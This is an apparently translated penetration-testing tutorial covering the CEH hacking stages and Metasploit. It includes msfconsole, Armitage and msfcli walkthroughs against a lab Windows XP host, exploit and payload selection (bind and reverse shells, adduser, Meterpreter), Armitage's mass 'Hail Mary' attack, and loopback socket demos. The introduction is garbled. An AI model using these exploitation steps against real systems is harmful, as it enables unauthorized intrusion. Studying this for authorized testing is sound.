[Introductory paragraph: Arabic text, OCR-garbled beyond recovery; only the term "script kids" is legible.]

1. Footprinting

Footprinting is the process of collecting information about the target network before any attack is attempted: the organisation's IP address range, its namespace (the domain names it owns) and how its employees use the web. Footprinting is the first step in reconnaissance and uses publicly available sources; Whois lookups, which return the registration details of the target's domains and address blocks, are the classic example.

2. Scanning

Scanning builds on the footprinting results to find out which hosts on the target network are actually live, which ports and services they expose, and which operating system they run, for example a Windows XP host with its particular set of open ports. Ping sweeps locate the live hosts and port scans enumerate their services; the result is a list of IP addresses and ports that are really reachable.

3. Enumeration

Enumeration is a more intrusive form of probing: it makes active connections to the target and issues directed queries to extract details such as user accounts, network shares, routing tables, SNMP management data and service banners. Because it connects to the target, enumeration is far more likely to be noticed than footprinting. Typical sources are DNS (zone transfers and host records) and, on Windows, a Null Session to the IPC$ share, which lets an unauthenticated client list users and shares.



What you have at this stage:

    Footprinting module:  IP range, namespace, employee web usage
    Scanning module:      reachable hosts and their open ports
    Enumeration module:   intrusive probing, user lists, security flaws
Once enumeration is complete the attacker has a concrete set of targets and can start attacking the system itself. The CEH hacking methodology breaks that attack into stages, each with its own goal and its typical techniques or exploits:



    Hacking stage            Goal                                                    Technique / exploit used
    ----------------------   -----------------------------------------------------   --------------------------------------
    Gaining Access           To collect enough information to gain access            Password eavesdropping, brute forcing
    Escalating Privileges    To create a privileged user account if user-level       Password cracking, known exploits
                             access is obtained
    Executing Applications   To create and maintain backdoor access                  Trojans
    Hiding Files             To hide malicious files                                 Rootkits
    Covering Tracks          To hide the presence of compromise                      Clearing logs

CEH Hacking Methodology (CHM)

Once footprinting, scanning and enumeration have identified the target's weak points, the attacker moves on to what is usually called SYSTEM HACKING or EXPLOITATION.

Exploitation is the use of a vulnerability to gain control of the target system; the Oracle padding exploit is one well-known example of a weakness being turned into access. The aim is to take over the system, ideally with administrative-level privileges, so that the attacker can run commands and install tools of their choosing.

Exploitation is carried out with an exploit: a program or piece of code that takes advantage of a specific vulnerability, whether in the operating system, a network service or an application, to make the target behave in a way it was never meant to. Every system has weaknesses; the attacker's job is to find out which vulnerabilities the target's operating systems (OSs), services and applications actually have and to obtain or write exploits for them. Metasploit is one of the most important tools for this task.



5.2 METASPLOIT



Metasploit is by far the most popular exploitation framework among penetration testers, and it is a full-featured tool rather than a toy: with it, the kind of break-in shown in films such as Swordfish becomes possible in practice.

In 2004, at Defcon 12, HD Moore and Spoonm presented "Metasploit: Hacking Like in the Movies", introducing the idea of an exploit framework: a platform for developing, testing and running exploit code. Metasploit provides exactly that, along with a large library of ready-made exploits, payloads and supporting tools, and it has since become the reference against which other frameworks are measured.

Exploit frameworks, old and new: Metasploit 2 was the first free framework to offer a library of exploits and interchangeable payloads comparable to the commercial products of the time, CORE Impact and ImmunitySec's CANVAS, both of which were sold at prices only large security teams could afford. Metasploit, by contrast, has always been free, which is why it became the framework most penetration testers learn first and why it set the standard that later exploit frameworks are compared against.
Metasploit makes a sharp distinction between exploits and payloads. A payload is the code that runs on the target after an exploit has succeeded; the exploit only opens the door, and the payload decides what happens next. Metasploit ships with a wide choice of payloads, from a simple command shell to a backdoor that keeps access open, and the same exploit can deliver any payload compatible with it.
Before using Metasploit it is important to understand what it is not: Metasploit is not a vulnerability scanner. It will not tell you which weaknesses a target has; it assumes you already know. In practice the vulnerability scanner finds the weak points and Metasploit exploits them: you take a finding from the scanner and search Metasploit for a matching exploit module. Metasploit does include auxiliary modules that probe for particular weaknesses, but these are not a substitute for a scanner; the framework's job is to exploit the vulnerabilities and the misconfigurations that the scanning stage has already found.
In 2009 Metasploit was acquired by Rapid7, and HD Moore joined the company to continue leading its development. Rapid7 has kept the Metasploit Framework free and open while adding the commercial Metasploit Express and Metasploit Pro editions, which add a graphical interface and automation on top of the same framework. Metasploit can be downloaded from the official site:

http://www.metasploit.com/

Metasploit comes pre-installed on Kali Linux, where most of this chapter's examples are run. It can be driven through a graphical interface (GUI) or through the msfconsole command line; this chapter uses msfconsole almost exclusively, because it exposes every option of every module.

To install Metasploit on a Windows machine instead:

1. Download the installer for your operating system from the site above.
2. Run the installer and follow the wizard. The first screen warns about anti-virus and firewall software:

    Setup

    *** Disable Anti-Virus ***
    This product is not compatible with common anti-virus solutions. Before continuing,
    please disable any installed anti-virus software or add an exclusion for the Metasploit
    installation directory. Failure to do so can lead to a corrupt installation and the
    malfunctioning of certain exploit modules.

    *** Disable Firewall ***
    This product is not compatible with common firewall applications. Although it is possible
    to use Metasploit with a firewall in place, a firewall will interfere with the function of
    certain exploits and payloads. Please ensure that your firewall is disabled prior to using this
    product for a penetration test.

    BitRock Installer                              < Back    Next >    Cancel

Take the warning literally, but only on a machine dedicated to testing: Metasploit's payload files are flagged by anti-virus products by design, and disabling protection on a workstation that is also used for e-mail or browsing is not an acceptable trade-off.



3. Click Next, accept the licence agreement and choose the installation directory.
4. The installer then asks for the SSL port of Metasploit's web interface. The default is 3790 over HTTPS; if that port is already in use by another service on the machine, choose a free one such as 8080 or 442.
5. Accept the remaining defaults with Next and click Finish when the installation completes.
6. Launch the Metasploit web interface from the Start menu:

Start > Programs > Metasploit > Access Metasploit UI



The web interface opens in the browser at the URL configured during installation (https://localhost:3790 by default).

7. Because the interface uses a self-signed certificate, Firefox reports "This Connection is Untrusted". Click "I Understand the Risks" and then "Add Exception" to continue:

    This Connection is Untrusted

    You have asked Firefox to connect securely to localhost:3790, but we can't confirm that your
    connection is secure.

    Normally, when you try to connect securely, sites will present trusted identification to prove that you
    are going to the right place. However, this site's identity can't be verified.

    What Should I Do?

    If you usually connect to this site without problems, this error could mean that someone is trying to
    impersonate the site, and you shouldn't continue.

    [Get me out of here!]

    I Understand the Risks

    If you understand what's going on, you can tell Firefox to start trusting this site's identification. Even if
    you trust the site, this error could mean that someone is tampering with your connection.

    Don't add an exception unless you know there's a good reason why this site doesn't use trusted
    identification.

    [Add Exception...]



MASTERING THE METASPLOIT CONSOLE (MSFCONSOLE) 



msfconsole is Metasploit's primary interface. It is the most popular way of driving Metasploit and the one that gives access to every option of every module; it provides a consistent way to search for an exploit, configure it and launch it against a target. Start it from a terminal:

#msfconsole

(The graphical alternative, msfgui, is started the same way.) Loading takes 10 to 30 seconds, so do not worry if nothing appears for a moment. Metasploit is ready when the banner and the [msf>] prompt appear; the banner art changes from one launch to the next. The first launch looks like this:



    # msfconsole

    [Metasploit ASCII-art banner]

    http://metasploit.pro

    Easy phishing: Set up email templates, landing pages and listeners
    in Metasploit Pro's wizard -- type 'go_pro' to launch it now.

           =[ metasploit v4.3.0-dev [core:4.6 api:1.3]
    + -- --=[ 1053 exploits - 590 auxiliary - 174 post
    + -- --=[ 275 payloads - 28 encoders - 8 nops
The last lines of the banner report how many exploits, payloads, encoders and nops this copy of Metasploit knows about. These numbers grow with every update, because new modules are added constantly, so keep Metasploit current by running the following from a terminal:

#msfupdate

Now that Metasploit is installed and up to date, a few terms must be clear before using it: vulnerability, exploit and payload.

A vulnerability is a weakness in the target's software that an attacker can take advantage of. An exploit is the code that takes advantage of a specific vulnerability, typically to run code of the attacker's choosing on the target; by itself it does nothing more than that. A payload is the code the exploit delivers and runs on the target once it succeeds: a command shell, a new user account, a backdoor that keeps access open, and so on. In Metasploit the two are chosen independently; every exploit lists the payloads compatible with it, and the same payload can be delivered by many different exploits. Choosing the exploit is deciding how to force the door; choosing the payload is deciding what to do once inside.

The basic msfconsole commands are:

    [help/?]                 Show help for the available commands.
    [use module]             Select the module you want to work with.
    [set option_name value]  Set an option of the selected module.
    [exploit]                Run the selected exploit module.
    [run]                    Run a non-exploit (auxiliary or post) module.
    [search term]            Search for a module by name or description.
    [exit]                   Leave msfconsole.

msfconsole also passes operating-system commands through, so tools such as ping and nmap can be run without leaving the console, and nmap results saved as XML can be imported straight into Metasploit's database.

Exploitation using MSFCONSOLE

Before an exploit can be run you must know which vulnerabilities the target actually has. Metasploit holds a large library of exploits, so the real work is matching them to the target's weak points. This is where the scanning stage pays off: a vulnerability scanner such as Nessus or OpenVAS, or nmap's vulnerability scripts ("nmap --script vuln <target>"), reports the weaknesses it finds, and the findings it rates "High" or "Critical" are the ones to search Metasploit for first.

In the example below the target is the machine at 192.168.1.105, which Nmap identifies as Windows XP Service Pack 3. The Nessus or OpenVAS step described in chapter 2 is skipped here; the example goes straight from the Nmap scan to the exploit.

1. Run Nmap from inside msfconsole and save the results as XML so that they can be imported later:
    msf > nmap -n -oX my.xml 192.168.1.105
    [*] exec: nmap -n -oX my.xml 192.168.1.105

    Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-24 07:56 EDT
    Nmap scan report for 192.168.1.105
    Host is up (0.00053s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    2869/tcp open  icslap
    MAC Address: 00:0C:29:79:3F:68 (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds
    msf >
The scan results are now in my.xml, which Metasploit can read with db_import.

2. Import the XML file:

    msf > db_import my.xml
    [-] Database not connected

3. The import fails: msfconsole is not connected to its PostgreSQL database, so there is nowhere to store the hosts.










4. Confirm the database state with db_status:

    msf > db_status
    [*] postgresql selected, no connection
    msf >










5. Leave msfconsole and start the PostgreSQL and Metasploit services from the shell:

    root@kali:~# service postgresql start
    Starting PostgreSQL 9.1 database server: main.
    root@kali:~# service metasploit start
    Configuring Metasploit...
    Creating metasploit database user 'msf3'...
    Creating metasploit database 'msf3'...
    insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
    insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
    Starting Metasploit rpc server: prosvc.
    Starting Metasploit web server: thin.
    Starting Metasploit worker: worker.



6. Start msfconsole again and check db_status; it now reports a connection to the msf3 database:

    msf > db_status
    [*] postgresql connected to msf3
    msf >



Note: to have PostgreSQL and Metasploit start automatically at boot, enable both services with update-rc.d:

    #update-rc.d postgresql enable
    #update-rc.d metasploit enable



7. Now import the Nmap results into Metasploit:

    msf > db_import my.xml
    [*] Importing 'Nmap XML' data
    [*] Import: Parsing with 'Nokogiri v1.6.0'
    [*] Importing host 192.168.1.105
    [*] Successfully imported /root/my.xml
    msf >





8. Run hosts to list the hosts now stored in Metasploit's database, populated from the Nmap scan:

    msf > hosts

    Hosts
    =====

    address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
    -------        ---                ----  -------  ---------  -----  -------  ----  --------
    192.168.1.105  00:0C:29:79:3F:68        Unknown

    msf >



9. Run services to list the services the scan found on those hosts:

    msf > services

    Services
    ========

    host           port  proto  name          state  info
    ----           ----  -----  ----          -----  ----
    192.168.1.105  135   tcp    msrpc         open
    192.168.1.105  139   tcp    netbios-ssn   open
    192.168.1.105  445   tcp    microsoft-ds  open
    192.168.1.105  2869  tcp    icslap        open



10. A more detailed scan can be run directly into the database with db_nmap, which accepts the usual Nmap options; -A adds service versions and OS detection:

    msf > db_nmap -n -A 192.168.1.105
    [*] Nmap: Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-24 09:19 EDT
    [*] Nmap: Nmap scan report for 192.168.1.105
    [*] Nmap: Host is up (0.00052s latency).
    [*] Nmap: Not shown: 996 closed ports
    [*] Nmap: PORT     STATE SERVICE      VERSION
    [*] Nmap: 135/tcp  open  msrpc        Microsoft Windows RPC
    [*] Nmap: 139/tcp  open  netbios-ssn



11. Metasploit has now updated its records with the operating system and service versions; hosts and services show the extra detail:

    msf > hosts

    address        mac                name  os_name               os_flavor  os_sp  purpose  info  comments
    -------        ---                ----  -------               ---------  -----  -------  ----  --------
    192.168.1.105  00:0C:29:79:3F:68        Microsoft Windows XP                    device

    msf > services

    Services
    ========

    host           port  proto  name          state  info
    ----           ----  -----  ----          -----  ----
    192.168.1.105  135   tcp    msrpc         open   Microsoft Windows RPC
    192.168.1.105  139   tcp    netbios-ssn   open
    192.168.1.105  445   tcp    microsoft-ds  open   Microsoft Windows XP microsoft-ds
    192.168.1.105  2869  tcp    http          open   Microsoft HTTPAPI httpd 1.0 SSDP/UPnP
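What db_import actually stores is a small subset of the Nmap XML: addresses, OS match, and one row per port with its state and banner. The following added example (not part of the original page or of Metasploit) parses that XML offline and rebuilds the hosts and services views, so you can inspect a scan, or diff two scans, without a database. SAMPLE_XML is constructed here to mirror the 192.168.1.105 scan above; it is not output captured from the page.

```python
"""Parse Nmap -oX output into the host/service records that Metasploit's
db_import keeps, and render them like the `hosts` and `services` commands."""
from __future__ import annotations
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample, shaped like `nmap -n -A -oX my.xml 192.168.1.105` would write.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -n -A -oX my.xml 192.168.1.105">
  <host>
    <status state="up"/>
    <address addr="192.168.1.105" addrtype="ipv4"/>
    <address addr="00:0C:29:79:3F:68" addrtype="mac" vendor="VMware"/>
    <ports>
      <extraports state="closed" count="996"/>
      <port protocol="tcp" portid="135"><state state="open"/>
        <service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/>
        <service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
      <port protocol="tcp" portid="2869"><state state="open"/>
        <service name="http" product="Microsoft HTTPAPI httpd" version="1.0" extrainfo="SSDP/UPnP"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2 or SP3" accuracy="100"/></os>
  </host>
</nmaprun>
"""

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    info: str          # product/version/extrainfo; empty until -sV or -A is used

@dataclass
class Host:
    address: str
    mac: str = ""
    os_name: str = ""  # best <osmatch>; empty until -O or -A is used
    services: list[Service] = field(default_factory=list)

def parse_nmap_xml(xml_text: str) -> list[Host]:
    """Return one Host per <host> element with its addresses, OS guess and ports."""
    hosts: list[Host] = []
    for h in ET.fromstring(xml_text).iter("host"):
        host = Host(address="")
        for addr in h.findall("address"):
            if addr.get("addrtype") == "mac":
                host.mac = addr.get("addr", "")
            else:                                   # ipv4 or ipv6
                host.address = addr.get("addr", "")
        # Nmap may list several OS matches; keep the one with the highest accuracy.
        matches = [(int(m.get("accuracy", "0")), m.get("name", "")) for m in h.iter("osmatch")]
        if matches:
            host.os_name = max(matches)[1]
        for p in h.iter("port"):
            state = p.find("state")
            svc = p.find("service")
            info = ""
            if svc is not None:
                info = " ".join(x for x in (svc.get("product"), svc.get("version"),
                                            svc.get("extrainfo")) if x)
            host.services.append(Service(
                port=int(p.get("portid", "0")),
                proto=p.get("protocol", ""),
                state=state.get("state", "unknown") if state is not None else "unknown",
                name=svc.get("name", "") if svc is not None else "",
                info=info,
            ))
        hosts.append(host)
    return hosts

def open_ports(host: Host) -> list[int]:
    """Ports Nmap reported as open, sorted; closed and filtered ports are left out."""
    return sorted(s.port for s in host.services if s.state == "open")

def services_table(hosts: list[Host]) -> str:
    """Render the same columns as msfconsole's `services` command."""
    rows = [f"{'host':<15} {'port':<5} {'proto':<5} {'name':<13} {'state':<6} info"]
    for h in hosts:
        for s in sorted(h.services, key=lambda s: (s.proto, s.port)):
            rows.append(f"{h.address:<15} {s.port:<5} {s.proto:<5} {s.name:<13} {s.state:<6} {s.info}".rstrip())
    return "\n".join(rows)

if __name__ == "__main__":
    scanned = parse_nmap_xml(SAMPLE_XML)
    for host in scanned:
        print(f"{host.address}  {host.mac}  {host.os_name}  open: {open_ports(host)}")
    print(services_table(scanned))
```

Run it against a real file with `parse_nmap_xml(open("my.xml").read())`. Note that without -sV or -A the info column stays empty and os_name is blank, exactly as in the first hosts listing above, which is why step 10 re-scans with -A before looking for an exploit.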



12. The services table shows msrpc listening on port 135, a service for which Metasploit has exploits. Note that finding a usable exploit is rarely this straightforward in practice: you need an exploit for a vulnerability the target actually has, which is exactly what a vulnerability scanner establishes and a port scan does not.

13. Search Metasploit for exploit modules related to the service. Each result carries a rank; "excellent" is the highest and is the safest to run. Every module is also documented online at http://www.metasploit.com/modules/exploit/

    msf > search msrpc

    Matching Modules
    ================

       Name                                  Disclosure Date  Rank  Description
       ----                                  ---------------  ----  -----------
       exploit/windows/dcerpc/ms05_017_msmq  2005-04-12       good  Microsoft Message Queueing Service Path Overflow



14. Select the ms05_017_msmq module with use; the prompt changes to show the active module:

    msf > use exploit/windows/dcerpc/ms05_017_msmq
    msf exploit(ms05_017_msmq) >



15. Once a module is selected, show options lists the options it takes, which of them are required, and the targets it supports; the following steps fill in the required ones and choose a payload:

    msf exploit(ms05_017_msmq) > show options

    Module options (exploit/windows/dcerpc/ms05_017_msmq):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       HNAME                   no        The NetBIOS hostname of the target
       RHOST                   yes       The target address
       RPORT  2103             yes       The target port

    Exploit target:

       Id  Name
       --  ----
       0   Windows 2000 ALL / Windows XP SP0-SP1 (English)

    msf exploit(ms05_017_msmq) >

Two things in this output deserve attention before going further. The only target listed is Windows 2000 or Windows XP SP0-SP1, while Nmap identified this host as Windows XP SP3, and the module's default port 2103 (the Message Queuing RPC port) was not among the open ports found by the scan. Either fact alone is reason to expect the exploit to fail against this host. Comparing the target list and the module's port with the scan results before launching is how you avoid firing exploits that cannot work and only generate noise in the target's logs.



16. RHOST is the required option: set it to the target's IP address.

    msf exploit(ms05_017_msmq) > set RHOST 192.168.1.105

17. Next choose a payload. An exploit only accepts payloads compatible with it; show payloads lists the compatible ones:

    msf exploit(ms05_017_msmq) > show payloads

    Compatible Payloads
    ===================

       Name                              Disclosure Date  Rank    Description
       ----                              ---------------  ----    -----------
       generic/custom                                     normal  Custom Payload
       generic/debug_trap                                 normal  Generic x86 Debug Trap
       generic/shell_bind_tcp                             normal  Generic Command Shell, Bind TCP Inline
       generic/shell_reverse_tcp                          normal  Generic Command Shell, Reverse TCP Inline
       generic/tight_loop                                 normal  Generic x86 Tight Loop
       windows/adduser                                    normal  Windows Execute net user /ADD
       windows/dllinject/bind_ipv6_tcp                    normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
Choose one of them with set PAYLOAD:

    msf exploit(ms05_017_msmq) > set PAYLOAD generic/shell_bind_tcp
    PAYLOAD => generic/shell_bind_tcp
    msf exploit(ms05_017_msmq) >



18. Finally, launch the attack with exploit.

To summarise, the complete procedure in msfconsole is:

1. Start Metasploit from a terminal:

#msfconsole

2. Search for an exploit matching the vulnerability found on the target, by missing patch number or CVE:

msf> search missingpatchnumber (or CVE)

3. Select the exploit found in step 2 with use:

msf> use exploit name and path

4. List the payloads compatible with that exploit:

msf> show payloads

5. Choose a payload:

msf> set payload path_to_payload

6. Display the options that must be set before launching:

msf> show options

7. Set each required option:

msf> set option_name desired_option_input

8. Launch the exploit against the target:

msf> exploit
Metasploit offers a wide range of payloads, from simple command shells to VNC injection, which gives the attacker a graphical desktop on the target, and Meterpreter, the most capable of all, described below. Because exploits and payloads are interchangeable, any of them can be delivered by the same exploit; the choice depends on what access is needed and how the target network is laid out. The table below lists some of the most commonly used Windows payloads:


    Metasploit payload name           Payload description
    -------------------------------   -----------------------------------------------------------------------------------
    windows/adduser                   Create a new user in the local administrator group on the target machine
    windows/exec                      Execute a Windows binary (.exe) on the target machine
    windows/shell_bind_tcp            Open a command shell on the target machine and wait for a connection
    windows/shell_reverse_tcp         Target machine connects back to the attacker and opens a command shell (on the target)
    windows/meterpreter/bind_tcp      Target machine installs Meterpreter and waits for a connection
    windows/meterpreter/reverse_tcp   Installs Meterpreter on the target machine, then creates a connection back to the attacker
    windows/vncinject/bind_tcp        Installs VNC on the target machine and waits for a connection
    windows/vncinject/reverse_tcp     Installs VNC on the target machine and sends the VNC connection back to the attacker

Payloads also exist for Linux, BSD, OS X and other platforms; show payloads lists the ones compatible with the selected exploit.

The two payloads used most often are windows/meterpreter/bind_tcp and windows/meterpreter/reverse_tcp. They deliver the same thing and differ only in who opens the connection:
Bind Payloads

A bind payload opens a listening port on the target once the exploit has run; the attacker then connects to that port to reach the shell. Both the exploit and the follow-up connection travel from attacker to target:

    1) Exploit:     Attacker  ------>  Target
    2) Connection:  Attacker  ------>  Target

Reverse Payloads

A reverse payload makes the target connect back to the attacker after the exploit has run, so the attacker must already be listening for it. The exploit goes from attacker to target; the connection comes back the other way:

    1) Exploit:     Attacker  ------>  Target
    2) Connection:  Attacker  <------  Target
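The difference is purely about which side calls connect() and which side calls listen(). The added example below (not part of the original page or of Metasploit) plays both patterns out on the loopback interface: a plain TCP socket with a fake "shell" stands in for the payload, and the port numbers are chosen by the OS rather than the usual 4444. Real bind and reverse payloads behave the same way at the network level.

```python
"""Bind vs. reverse payload: who listens and who connects, on 127.0.0.1."""
import socket
import threading

HOST = "127.0.0.1"

def _listener() -> socket.socket:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((HOST, 0))          # port 0: let the OS pick a free port (stands in for 4444)
    s.listen(1)
    return s

def _fake_shell(conn: socket.socket) -> None:
    """What the payload does on the target: read a command, answer it."""
    cmd = conn.recv(1024).decode()
    conn.sendall(f"target$ {cmd}\nuid=0(SYSTEM)\n".encode())

def _serve_once(listener: socket.socket, handler) -> None:
    """Accept exactly one connection, hand it to `handler`, then close."""
    conn, _ = listener.accept()
    with conn:
        handler(conn)
    listener.close()

def bind_payload_session(command: str = "id") -> dict:
    """Bind payload: the TARGET listens, the ATTACKER connects to it."""
    target = _listener()
    port = target.getsockname()[1]
    worker = threading.Thread(target=_serve_once, args=(target, _fake_shell))
    worker.start()
    with socket.create_connection((HOST, port)) as attacker:      # attacker -> target
        attacker.sendall(command.encode())
        reply = attacker.recv(1024).decode()
    worker.join()
    return {"listener": "target", "initiator": "attacker", "reply": reply}

def reverse_payload_session(command: str = "id") -> dict:
    """Reverse payload: the ATTACKER listens (multi/handler), the TARGET connects back."""
    attacker = _listener()
    port = attacker.getsockname()[1]
    result = {}

    def operator(conn: socket.socket) -> None:   # attacker side, once the target calls in
        conn.sendall(command.encode())
        result["reply"] = conn.recv(1024).decode()

    worker = threading.Thread(target=_serve_once, args=(attacker, operator))
    worker.start()
    with socket.create_connection((HOST, port)) as target:        # target -> attacker
        _fake_shell(target)
    worker.join()
    return {"listener": "attacker", "initiator": "target", "reply": result["reply"]}

if __name__ == "__main__":
    for session in (bind_payload_session(), reverse_payload_session()):
        print(f"{session['initiator']} connected to {session['listener']}: {session['reply']!r}")
```

The practical consequence: a bind payload needs an inbound path to a new port on the target, which firewalls and NAT rarely allow, whereas a reverse payload only needs the target to make an outbound connection to LHOST, which is why reverse payloads are the default choice on real networks and why the attacker's listener must be running before the exploit fires.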

Meterpreter deserves special attention, because it is what makes Metasploit so effective once the exploit has succeeded. Meterpreter, short for Meta-Interpreter, is an advanced, dynamically extensible payload developed for Metasploit. A plain shell payload gives you cmd.exe on Windows or /bin/sh on Linux, and nothing more. Meterpreter instead runs entirely in the memory of the exploited process and writes nothing to disk, which makes it much harder for anti-virus and forensic tools to detect, and it injects itself into an existing process rather than starting a new one.

On top of that it offers commands a plain shell does not. The most useful are "migrate", which moves the Meterpreter session into another process (for example one less likely to be killed or examined), "download" and "upload" to move files from and to the target, "edit" to change files on the target, "execute" to run programs, and "kill" to terminate processes. The familiar shell commands "cd", "ls", "ps", "shutdown", "mkdir", "pwd" and "ifconfig" work as well, with the same meaning as on the local system.

Post-exploitation is where Meterpreter really shines; its use after the compromise is covered in detail in the chapter on post exploitation.
MASTERING ARMITAGE, THE GRAPHICAL MANAGEMENT TOOL FOR METASPLOIT



Armitage is a graphical management tool for Metasploit. msfconsole remains the most complete interface, but Armitage makes it much easier to keep track of many targets and many Metasploit and Meterpreter sessions at the same time, and it shows the whole engagement visually: hosts, exploits that apply to them, and sessions opened on them.

Armitage is included in Kali Linux and can also be downloaded from http://www.fastandeasyhacking.com . Start it from the Kali menu:

Start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage



1. Armitage first asks how to reach Metasploit's RPC server. The defaults (Host 127.0.0.1, User msf) are correct for a local installation; click Connect:

    Connect
    Host   127.0.0.1
    Port
    User   msf
    Pass
    [Connect]  [Help]



2. If Metasploit's RPC server is not running yet, Armitage offers to start it; this can take a minute or so. Answer Yes to "Start Metasploit?":

    Start Metasploit?

    A Metasploit RPC server is not running or
    not accepting connections yet. Would you
    like me to start Metasploit's RPC server
    for you?

    [No]  [Yes]






The Armitage window is divided into three areas:

A: The module browser, a tree of Metasploit's auxiliary, exploit, payload and post modules, with a search box underneath to filter it.

B: The targets area, where the hosts found by scanning appear and where exploited hosts are marked.

C: The tabs area, which holds the Metasploit console and any Meterpreter or shell sessions opened on targets.

    Armitage   View   Hosts   Attacks   Workspaces   Help

    [A: auxiliary / exploit / payload / post]        [B: targets]

    [C: Console]
           =[ metasploit v4.2.8-release [core:4.2 api:1.0]
    + -- --=[ 805 exploits - 450 auxiliary - 135 post
    + -- --=[ 246 payloads - 27 encoders - 8 nops
           =[ svn r14805 updated 177 days ago (2012.02.23)

    Warning: This copy of the Metasploit Framework was last updated 177 days ago.
    We recommend that you update the framework at least every other day.
    For information on updating your copy of Metasploit, please see:
    https://community.rapid7.com/docs/DOC-1306



Scanning from Armitage

Before anything can be exploited you need targets, so the first step is to scan the network. Armitage drives Nmap for you: choose Hosts > Nmap Scan > Quick Scan (OS detect) and enter an IP address or range when prompted.

    Nmap Scan
      Intense Scan
      Intense Scan + UDP
      Intense Scan, all TCP ports
      Intense Scan, no ping
      Ping Scan
      Quick Scan
      Quick Scan (OS detect)
      Comprehensive

Running a Nmap scan from Armitage to identify targets.

When the scan finishes, the hosts it found appear in the targets area with an icon for the detected operating system, and Armitage suggests the next step, Attacks > Find Attacks, which matches exploits to each host's services and operating system:
    Scan Complete!

    Use Attacks->Find Attacks to suggest
    applicable exploits for your targets.

Screenshot showing Armitage has identified a potential target.

Find Attacks adds an Attack menu to each host listing the exploits that apply to it, so you can pick one per host. For the blunt approach, choose "Hail Mary" from the "Attacks" menu:



    Armitage   View   Hosts   Attacks   Workspaces   Help

Running a Hail Mary with Armitage.

Hail Mary throws every exploit that Find Attacks considered relevant at every host in the targets area, in order of rank. A progress bar tracks the attempts; when it finishes, Armitage redraws the targets view and any host that was successfully exploited is shown with the red, lightning-struck icon of a compromised system, with one shell or Meterpreter session per successful exploit. Hail Mary is the noisiest thing Armitage can do: every attempt is logged on the target and triggers any intrusion detection in between, so it belongs in a lab, not in an engagement where stealth matters.

Armitage success and three remote shells.
Once a host has been exploited, right-click it and choose Shell > Interact (or Meterpreter > Interact for a Meterpreter session) to open a tab with the session and start issuing commands:

Interacting with a remote shell through Armitage.



MASTERING THE METASPLOIT CLI (MSFCLI) 



The third interface is the Metasploit command-line interface, MSFCLI. Where msfconsole is an interactive shell, msfcli runs a single module from one command line: module path, options and mode all in one go. Its main advantage is scripting; because a whole exploit is one command, msfcli fits naturally into shell scripts and automation. Its disadvantage is that it is far less flexible than msfconsole and that every invocation reloads Metasploit from scratch, which is slow. msfcli is best suited to running an exploit or scanner whose options you already know.

The msfcli command forms are:

1. msfcli                                          run msfcli (without arguments it prints its usage)
2. msfcli -h                                       show the msfcli help
3. msfcli [PATH TO EXPLOIT] [option=value] [mode]  run the given module with the given options

Note that the # prompt below means these commands are typed at the root shell, not inside msfconsole. Start with msfcli -h to see the available modes:
    root@kali:~# msfcli -h
    Usage: /opt/metasploit/apps/pro/msf3/msfcli <exploit_name> <option=value> [mode]

        Mode           Description
        ----           -----------
        (A)dvanced     Show available advanced options for this module
        (AC)tions      Show available actions for this auxiliary module
        (C)heck        Run the check routine of the selected module
        (E)xecute      Execute the selected module
        (H)elp         You're looking at it baby!
        (I)DS Evasion  Show available ids evasion options for this module
        (O)ptions      Show available options for this module
        (P)ayloads     Show available payloads for this module
        (S)ummary      Show information about this module
        (T)argets      Show available targets for this exploit module

    Examples:
    msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
    msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E



As an example we take the TCP "XMas" (Christmas Tree) scan module. Appending the mode A to the module path shows its advanced options:

root@kali:~# msfcli auxiliary/scanner/portscan/xmas A
[*] Initializing modules...

    Name           : GATEWAY
    Current Setting:
    Description    : The gateway IP address. This will be used rather than a random
                     remote address for the UDP probe, if set.

    Name           : NETMASK
    Current Setting: 24
    Description    : The local network mask. This is used to decide if an address is
                     in the local network.

    Name           : ShowProgress
    Current Setting: true
    Description    : Display progress messages during a scan

    Name           : ShowProgressPercent
    Current Setting: 10
    Description    : The interval in percent that progress should be shown

Advanced options are the ones you rarely need to change; most scans run with their defaults. To see what the module does and which options it needs, ask for its summary with S:

root@kali:~# msfcli auxiliary/scanner/portscan/xmas S
[*] Initializing modules...

       Name: TCP "XMas" Port Scanner
     Module: auxiliary/scanner/portscan/xmas
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  kris katterjohn <katterjohn@gmail.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  BATCHSIZE  256              yes       The number of hosts to scan per set
  INTERFACE                   no        The name of the interface
  PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS                      yes       The target address range or CIDR identifier
  SNAPLEN    65535            yes       The number of bytes to capture
  THREADS    1                yes       The number of concurrent threads
  TIMEOUT    500              yes       The reply read timeout in milliseconds

Description:
  Enumerate open|filtered TCP services using a raw "XMas" scan; this
  sends probes containing the FIN, PSH and URG flags.

